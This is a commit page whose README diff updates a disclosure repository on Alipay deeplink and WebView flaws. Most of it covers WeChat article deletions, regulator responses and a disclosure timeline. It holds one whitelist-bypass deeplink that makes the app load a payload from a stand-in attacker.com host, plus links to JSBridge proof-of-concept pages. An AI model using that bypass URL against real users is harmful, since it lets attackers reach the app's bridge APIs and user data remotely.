icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

Update README: censorship notice corrected, all WeChat links marked DELETED

Browse Source 
- Fix: March 15 deletion has NO identified complainant (anonymous "related complaint")
- Fix: Clearly distinguish March 11 named complaint (rejected) vs March 15 anonymous (deleted)
- Add: Censorship analysis article link (innora.ai/zfb/article_censorship.html)
- Add: Full regulatory response table (38+ institutions, 16 countries)
- Add: Twitter thread link (@met3or)
- Mark: All 4 WeChat article links as DELETED with strikethrough
- Update: Timeline with March 15 censorship event
- Update: Mirrors table showing WeChat as DELETED

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
feng
2026-03-15 21:18:02 +08:00
parent 29f103c174
commit 2a8ba8e369
1 changed files with 96 additions and 76 deletions
Download Patch File Download Diff File Expand all files Collapse all files

172
README.md
View File

@@ -2,20 +2,36 @@
**17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries | 6 CVEs Applied** **17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries | 6 CVEs Applied**
> **⚠️ Official Update Channels**: All updates are published exclusively at: ---
> 1. **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/)
> 2. **WeChat**: Official Account **AI-security-innora** > ## ⚠️ CENSORSHIP UPDATE — 2026-03-15
> >
> Content from any other source is not authorized by our team. > **All 4 WeChat articles have been forcibly deleted.**
>
> The deletion notices state only: *"Received related complaint. Determined to violate the Cybersecurity Law."* Basis: *"related laws and regulations."*
>
> **No complainant identified. No specific law article cited. No appeal channel provided.**
>
> 4 days earlier (March 11), a named complaint by Beijing Geyun Law Firm citing "reputation infringement" was **reviewed and rejected** by WeChat — the platform found it did not constitute infringement. This time, an anonymous complaint succeeded where the named one failed.
>
> Meanwhile, the same research is independently verified by Packet Storm (#217089), accepted by MITRE (6 CVEs, Ticket #2005801), and under investigation by 16+ countries' regulators.
>
> ![Deletion Notice](wechat_censored_1.jpeg)
>
> **Full censorship analysis (bilingual EN/CN):** [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html)
## WeChat Articles ---
| Tag | Title | Link | ## WeChat Articles — ALL DELETED
|-----|-------|------|
| 🆕 NEW | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | [Read](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw) | | Status | Title | Original Link |
| 🔥 HOT | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | [Read](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg) | |--------|-------|---------------|
| ⚖️ LEGAL | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权" | [Read](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw) | | ~~DELETED~~ | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | ~~[Dead Link](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw)~~ |
| 📱 ORIGINAL | 位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐 | [Read](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q) | | ~~DELETED~~ | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | ~~[Dead Link](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg)~~ |
| ~~DELETED~~ | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权" | ~~[Dead Link](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw)~~ |
| ~~DELETED~~ | 位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐 | ~~[Dead Link](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q)~~ |
**Archived versions**: [innora.ai/zfb/](https://innora.ai/zfb/) | This repository
## Critical Finding: Whitelist Bypass (CVSS 9.3) ## Critical Finding: Whitelist Bypass (CVSS 9.3)
@@ -25,33 +41,56 @@
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html
``` ```
- **No developer permissions required** — No Alipay Open Platform registration, no Mini Program credentials, no approval - **No developer permissions required** — No registration, no credentials, no approval
- **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack remotely against 1B+ users - **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack 1B+ users remotely
- **Vendor acknowledged severity** — Ant Group stated "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor still refuses to patch, calling it "normal functionality" - **Vendor acknowledged severity** — During a 23-minute recorded call, Ant Group's security lead stated: "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor refuses to patch, calling it "normal functionality"
- **6 CVEs applied** via MITRE (Ticket #2005801), including this bypass as highest-severity (CWE-601 + CWE-939) - **6 CVEs applied** via MITRE (Ticket #2005801), CWE-601 + CWE-939
## Full Report ## Full Report
- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) - **Technical Report**: [innora.ai/zfb/](https://innora.ai/zfb/)
- **GitHub**: This repository - **Censorship Analysis**: [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html)
- **Packet Storm Advisory**: #217089
## Global Regulatory Response ## Global Regulatory Response
Reported to ~160 agencies across 22 countries. Active investigations by: Reported to ~160 agencies across 22 countries. **38+ institutions responded**:
- **Apple Product Security** — Active investigation
- **Google Play** — Policy violation investigation
- **MITRE CVE** — 6 CVEs applied (Ticket #2005801)
- **CSSF Luxembourg** — 4 departments confirmed receipt, ICT Risk Supervision noted contents
- **Singapore PDPC** — Formal data protection investigation
- **HKMA Hong Kong** — SVF licence compliance inquiry
- **CIRCL Luxembourg** — Contacting Alibaba SRC on our behalf
- **Packet Storm Security** — Advisory published (ID 217089)
## Summary | Institution | Country | Status |
|-------------|---------|--------|
| **Apple Product Security** | US | Active investigation |
| **Google Play** | US | Policy violation review |
| **MITRE CVE** | US | 6 CVEs accepted (Ticket #2005801) |
| **Packet Storm Security** | US | Advisory #217089 published |
| **CSSF Luxembourg** | EU | Whistleblowing case CSSFWB-2026-080 |
| **HKMA** | Hong Kong | SVF complaint filed |
| **PDPC** | Singapore | Privacy investigation opened |
| **FCA** | UK | Whistleblowing confirmed |
| **OAIC** | Australia | Intake confirmed |
| **EDPB** | EU | Cross-border complaint confirmed |
| **ANSSI** | France | Confirmed, forwarded |
| **CIRCL** | Luxembourg | Case #4782984, contacting Alibaba SRC |
| **FMA** | New Zealand | Confirmed, evaluating |
| **OJK** | Indonesia | Responded with follow-up |
| **Datatilsynet** | Denmark | Confirmed receipt |
| **NCSC** | UK | Confirmed receipt |
This repository documents a comprehensive security research project that uncovered **17 security vulnerabilities** in Alipay's DeepLink URI scheme (`alipays://`) and its Nebula WebView container. ## The Censorship Pattern
### Key Findings ```
Feb 25 - Mar 7 Private disclosure (4 rounds + 23-min recorded call)
Mar 10 Vendor: "normal functionality" — refuses to patch
Mar 11 18:16 Public disclosure on innora.ai/zfb/
Mar 11 22:45 Beijing Geyun Law Firm complaint → REJECTED by WeChat
Mar 12 Packet Storm #217089 published, 6 CVEs at MITRE
Mar 12-14 189 emails → 22 countries → 38+ responses
Mar 15 Anonymous complaint → ALL 4 ARTICLES DELETED
No complainant. No specific law. No appeal.
```
**The same content exists lawfully on Packet Storm, GitHub, and innora.ai — deleted only on Chinese platforms.**
## Key Findings
| Severity | Count | Examples | | Severity | Count | Examples |
|----------|-------|---------| |----------|-------|---------|
@@ -75,76 +114,57 @@ Attacker crafts URL (NO developer permissions needed)
- Samsung Galaxy S25 Ultra (Android 15, New Zealand) - Samsung Galaxy S25 Ultra (Android 15, New Zealand)
- Redmi 12 (Android 14, Malaysia) - Redmi 12 (Android 14, Malaysia)
- iPhone 16 Pro (iOS 18.3, China) - iPhone 16 Pro (iOS 18.3, China — tested by vendor's own security lead)
## Live PoC (Read-Only Demo) ## Live PoC (Read-Only Demo)
> **No data is collected or transmitted.** All results display locally only. > **No data is collected or transmitted.** All results display locally only.
- [Trigger Page](https://innora.ai/zfb/poc/trigger.html) — Simulates attacker distribution page - [Trigger Page](https://innora.ai/zfb/poc/trigger.html) — Simulates attacker distribution page
- [JSBridge PoC](https://innora.ai/zfb/poc/verify.html) — Demonstrates API access from external page - [JSBridge PoC](https://innora.ai/zfb/poc/verify.html) — Demonstrates API access
- [Chain WebView](https://innora.ai/zfb/poc/chain.html) — Proves chained pages retain bridge access - [Chain WebView](https://innora.ai/zfb/poc/chain.html) — Proves chained pages retain bridge access
## Responsible Disclosure Timeline ## Responsible Disclosure Timeline
| Date | Action | | Date | Action |
|------|--------| |------|--------|
| 2026-02-25 | Initial report sent to Ant Group SRC (TLS/SSL findings) | | 2026-02-25 | Initial report sent to Ant Group SRC |
| 2026-03-07 | Full report V3 sent with 17 vulnerabilities + 308 log entries | | 2026-03-07 | Full report V3: 17 vulnerabilities + 308 log entries |
| 2026-03-10 | Ant Group response: "These are normal features" (正常功能) | | 2026-03-07 | 23-min call with vendor security lead (recorded) |
| 2026-03-11 | Public disclosure after vendor declined to acknowledge | | 2026-03-10 | Vendor: "normal functionality" |
| 2026-03-11 | Ant Group's law firm filed WeChat complaint (dismissed by platform) | | 2026-03-11 | Public disclosure |
| 2026-03-12 | Packet Storm Security published advisory (ID 217089) | | 2026-03-11 | Beijing Geyun Law Firm complaint → **rejected by WeChat** |
| 2026-03-12 | 6 CVE IDs applied via MITRE (Ticket #2005801) | | 2026-03-12 | Packet Storm #217089 published |
| 2026-03-12~14 | ~170 emails sent to ~160 regulatory agencies across 22 countries | | 2026-03-12 | 6 CVEs applied via MITRE (Ticket #2005801) |
| 2026-03-13 | HKMA, PDPC, CSSF, Apple, Google, CIRCL confirmed receipt/investigation | | 2026-03-12~14 | 189 emails → 22 countries → 38+ responses |
| 2026-03-14 | Whitelist bypass (CVSS 9.3) highlighted as master key finding | | **2026-03-15** | **ALL 4 articles deleted — anonymous complaint, no appeal** |
| 2026-03-15 | Censorship analysis published |
## Repository Structure
```
├── index.html # Full bilingual (CN/EN) research blog
├── rebuttal.html # Legal rebuttal to lawyer's complaint
├── wechat_article.html # WeChat public account article
├── poc/
│ ├── trigger.html # Attack trigger simulation page
│ ├── verify.html # JSBridge exploitation PoC
│ └── chain.html # Chain WebView demonstration
├── review_kimi.md # Kimi K2 cross-validation review
├── review_sonnet.md # Sonnet review
├── review_summary.md # Review summary
└── README.md # This file
```
## Evidence
- **308 server exfiltration log entries** (JSONL format, not included in public repo)
- **42 real-device screenshots** (not included in public repo)
- Full evidence available upon request: feng@innora.ai
## Legal Disclaimer
This research is conducted for **educational and security improvement purposes only**. All testing was performed on accounts owned by the researcher. No unauthorized access to third-party accounts or data occurred.
The PoC pages are **read-only demonstrations** with all data exfiltration endpoints disabled. They only display results locally in the browser.
## Mirrors & Archives ## Mirrors & Archives
To prevent single-point deletion, this research is archived at multiple locations: | Location | Status |
|----------|--------|
| **[innora.ai/zfb/](https://innora.ai/zfb/)** | Active |
| **GitHub** (this repo) | Active |
| **Packet Storm #217089** | Permanently archived |
| ~~WeChat~~ | **DELETED** (2026-03-15) |
- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) **Fork this repository as backup.**
- **GitHub**: [https://github.com/sgInnora/alipay-deeplink-research](https://github.com/sgInnora/alipay-deeplink-research)
If any mirror is taken down, please check the other locations. ## Evidence
**Readers are encouraged to fork this repository as backup.** - **308 server exfiltration log entries** (JSONL format)
- **42 real-device screenshots**
- **Deletion notice screenshots**: `wechat_censored_1.jpeg`, `wechat_censored_2.jpeg`
- Full evidence available: feng@innora.ai
## Contact ## Contact
- **Researcher**: Innora AI Security Research Team - **Researcher**: Jiqiang Feng — Innora AI Security Research
- **Email**: feng@innora.ai - **Email**: feng@innora.ai
- **Website**: [innora.ai](https://innora.ai) - **Website**: [innora.ai](https://innora.ai)
- **Twitter**: [@met3or](https://x.com/met3or/status/2033155342427967558)
--- ---
*This research follows responsible disclosure practices. The vendor was given adequate time to respond before public disclosure.* *This research follows ISO/IEC 29147:2018 responsible disclosure practices.*